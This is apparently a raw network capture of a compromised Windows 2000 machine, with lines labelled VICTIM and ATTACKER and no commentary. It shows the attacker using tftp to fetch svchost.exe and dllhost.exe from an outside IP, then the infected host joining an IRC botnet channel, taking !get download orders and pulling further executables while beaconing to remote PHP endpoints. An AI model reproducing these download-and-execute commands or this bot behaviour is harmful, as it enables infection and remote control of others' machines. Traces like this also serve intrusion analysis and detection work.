VICTIM: Microsoft Windows 2000 [Version 5.00.2195] VICTIM: (C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32> VICTIM: dir wins\\dllhost.exe VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\winsFile Not FoundC:\\WINNT\\system32> VICTIM: dir dllcache\\tftpd.exe VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\dllcacheFile Not FoundC:\\WINNT\\system32> VICTIM: tftp -i 70.165.19.238 get svchost.exe wins\\SVCHOST.EXE VICTIM: \000\001svchost.exe\000octet\000 VICTIM: \000\004\000\001 VICTIM: \000\004\000\002 VICTIM: \000\004\000\003 VICTIM: \000\004\000\004 VICTIM: \000\004\000\005 VICTIM: \000\004\000\006 VICTIM: \000\004\000\007 VICTIM: \000\004\000\010 VICTIM: \000\004\000\t VICTIM: \000\004\000 VICTIM: \000\004\000\013 VICTIM: \000\004\000\014 VICTIM: \000\004\000 VICTIM: \000\004\000\016 VICTIM: \000\004\000\017 VICTIM: \000\004\000\020 VICTIM: \000\004\000\021 VICTIM: \000\004\000\022 VICTIM: \000\004\000\023 VICTIM: \000\004\000\024 VICTIM: \000\004\000\025 VICTIM: \000\004\000\026 VICTIM: \000\004\000\027 VICTIM: \000\004\000\030 VICTIM: \000\004\000\031 VICTIM: \000\004\000\032 VICTIM: \000\004\000\033 VICTIM: \000\004\000\034 VICTIM: \000\004\000\035 VICTIM: \000\004\000\036 VICTIM: \000\004\000\037 VICTIM: \000\004\000 VICTIM: \000\004\000! VICTIM: \000\004\000\ VICTIM: \000\004\000# VICTIM: \000\004\000\$ VICTIM: \000\004\000% VICTIM: \000\004\000& VICTIM: \000\004\000' VICTIM: \000\004\000( VICTIM: \000\004\000) VICTIM: \000\004\000* VICTIM: \000\004\000+ VICTIM: \000\004\000, VICTIM: \000\004\000- VICTIM: \000\004\000. VICTIM: \000\004\000/ VICTIM: \000\004\0000 VICTIM: \000\004\0001 VICTIM: \000\004\0002 VICTIM: \000\004\0003 VICTIM: \000\004\0004 VICTIM: \000\004\0005 VICTIM: \000\004\0006 VICTIM: \000\004\0007 VICTIM: \000\004\0008 VICTIM: \000\004\0009 VICTIM: \000\004\000: VICTIM: Transfer successful: 29456 bytes in 4 seconds, 7364 bytes/s VICTIM: C:\\WINNT\\system32> VICTIM: \000\001dllhost.exe\000octet\000 VICTIM: tftp -i 70.165.19.238 get dllhost.exe wins\\DLLHOST.EXE VICTIM: \000\001dllhost.exe\000octet\000 VICTIM: \000\001dllhost.exe\000octet\000 VICTIM: \000\004\000\001 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\004\000\001 VICTIM: \000\004\000\001 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\004\000\002 VICTIM: \000\004\000\003 VICTIM: \000\004\000\004 VICTIM: \000\004\000\005 VICTIM: \000\004\000\006 VICTIM: \000\004\000\007 VICTIM: \000\004\000\010 VICTIM: \000\004\000\t VICTIM: \000\004\000 VICTIM: \000\004\000\013 VICTIM: \000\004\000\014 VICTIM: \000\004\000 VICTIM: \000\004\000\016 VICTIM: \000\004\000\017 VICTIM: \000\004\000\020 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\004\000\021 VICTIM: \000\004\000\022 VICTIM: \000\004\000\023 VICTIM: \000\004\000\024 VICTIM: \000\004\000\025 VICTIM: \000\004\000\026 VICTIM: \000\004\000\027 VICTIM: \000\004\000\030 VICTIM: \000\004\000\031 VICTIM: \000\004\000\032 VICTIM: \000\004\000\033 VICTIM: \000\004\000\034 VICTIM: \000\004\000\035 VICTIM: \000\004\000\036 VICTIM: \000\004\000\037 VICTIM: \000\004\000 VICTIM: \000\004\000! VICTIM: \000\004\000\ VICTIM: \000\004\000# VICTIM: \000\004\000\$ VICTIM: \000\004\000% VICTIM: \000\004\000& VICTIM: \000\004\000' VICTIM: \000\004\000( VICTIM: Transfer successful: 19968 bytes in 6 seconds, 3328 bytes/s VICTIM: C:\\WINNT\\system32> VICTIM: wins\\DLLHOST.EXE VICTIM: NICK wmrjkmsdUSER f020500 . . :- VICTIM: Service Pack 2JOIN &virtu ATTACKER: :u. PRIVMSG wmrjkmsd :!get http:/shabi.coolnuff.com:2012/p/out/kp.exe:u. PRIVMSG wmrjkmsd :!get http:/mymelanet.com/ml2.txt VICTIM: GET /ml2.txt HTTP/1.0User-Agent: DownloadHost: mymelanet.comPragma: no-cache ATTACKER: GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B2969FEDCEBCA8B5FF8F6CEDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5F44337&v=2&t=0.9667627 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mewgost.comConnection: Keep-AlivePragma: no-cache ATTACKER: GET /tm/3387x.exe?t=0.8599512 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mymelanet.comConnection: Keep-AlivePragma: no-cache ATTACKER: GET /sn.php?c=9F81896D0E9E2A8886764E178CFA7F8B529BC7FED0F1EF7594AC8EC814C395B387CD415792FD99AA4779E292505DB1AD3DCB7E983E9CE8CCDEEC0D797E019EF495DA9A3D03CCD14EFDC7A4DE5DB39A4554A3C3FED3ADFBFD2C8E8EE3B35BD7A36432BDB7E6FD42EE57E48B0CC7C7FB6153A45E71357237104D14AAC5E751A11FD3DA13B0002E9E564173D282E427D555&t=6.087893E-02 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mewgost.comConnection: Keep-AlivePragma: no-cache ATTACKER: GET /sn.php?c=2D337F9BEA7A77D59464673E20564BBFF63FE3DAFEDFF963576FBDFBB96E2F09BEF4AFB9AEC1281B89B76E1E5459D0CC03F5E70170D2290D390BC9BD88F7ED87094643E4995674EB7B410F750CE2D90654A3AF92E799585EE94BF79A41A9FB8F3264CBC1F8E376DA1FAC2ABCA65F4FC72FDA6B35D08342703E2AC7B261C3E3199E8E18BF576385446A59E0B1BD7D5BD917F7&t=0.901333 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mewgost.comConnection: Keep-AlivePragma: no-cache ATTACKER: PING :k. ATTACKER: PONG :k. VICTIM: JOIN &virtu ATTACKER: GET /bl/wus.exe?t=0.8853418 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: wertlist.comConnection: Keep-AlivePragma: no-cache ATTACKER: GET /sn.php?c=011FC420F36373D4839993BAD39F33F362F8D8E099D759C3C4FC763FB4186C37A4EECB2318225A71C8FED54AD9D7BC52F339997FF8945C745C3DC5627C04F486603194E0C5C039A6744EF2881EF018C75DAAE0DD91EF4046A3011B76FF17E0944315F8F26F74B21EA4179314A7A738A2CC3B2807F9BE4562D48DC1AE60D6C07E999512BACCF9A563B58CA1F9B97A4CC8&t=0.8182032 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mewgost.comConnection: Keep-AlivePragma: no-cache ATTACKER: GET /sn.php?c=A8B62ECA5FCFF255766C2108AFE3C606F16B0C3416585CC60931743D11BD114A3C762AC2417BD0FB52642AB5BDB321CF4A80C325ADC1634B94F5F85F156D552781D02652EEEBDC43F7CDE8927B9500DF699E3805DAA4373106A4D7BAD931E6923167EEE40C1725893281F5631CE5C24A2BDED48A623189BB4D59483DB517C3394B5B892F80B1FD420F382A7E17D50B76AC77&t=0.6099512 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mewgost.comConnection: Keep-AlivePragma: no-cache ATTACKER: GET /tm/crty.exe?t=0.6363184 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mymelanet.comConnection: Keep-AlivePragma: no-cache ATTACKER: GET /sn.php?c=504E63879808A001C6360A53C9B3D81DFD3006613012CC00DDEF703115B3FCD3F68B677DA5982949157C58C62F20BAA615DE7C9493FC5F7DF8C9A2D6F68FF46F36672E56BB6CA837556F6218AF415E81BA4DDCE184FA5355BF1D600D816902760650D8D2776C45E90CBF991EF7F7BC2601F6E8C7C2857255D78EBDD28137BE009892C66EB78668AFFECBAFFBF3340D8E&t=0.6911585 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mewgost.comConnection: Keep-AlivePragma: no-cache ATTACKER: GET /sn.php?c=1A04B95D39A995341EEE18411B6133F6B17C5433C9EB3FF389BB1A5BCE686B44A0DD4B511825345489E0FD63F3FC0C1005CEC32B3857B795D2E32F5BC2BBF66DC39295ED22F563FC152F116B947A9C4301F6CBF6314FA3A58E2C7914668E85F1A9FF262CA4BF3A9677C432A459A0CD45EA1F9BC52073BC8E93877A0F3496A258B7A7D1782B0613D5A49C83D1E126C84B45A6&t=8.097476E-02 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mewgost.comConnection: Keep-AlivePragma: no-cache ATTACKER: PING :k. ATTACKER: PONG :k. VICTIM: JOIN &virtu ATTACKER: PING :k. ATTACKER: PONG :k. VICTIM: JOIN &virtu ATTACKER: PING :k. ATTACKER: PONG :k. VICTIM: JOIN &virtu ATTACKER: PONG :k. VICTIM: JOIN &virtu ATTACKER: PONG :k. VICTIM: JOIN &virtu ATTACKER: PONG :k. VICTIM: JOIN &virtu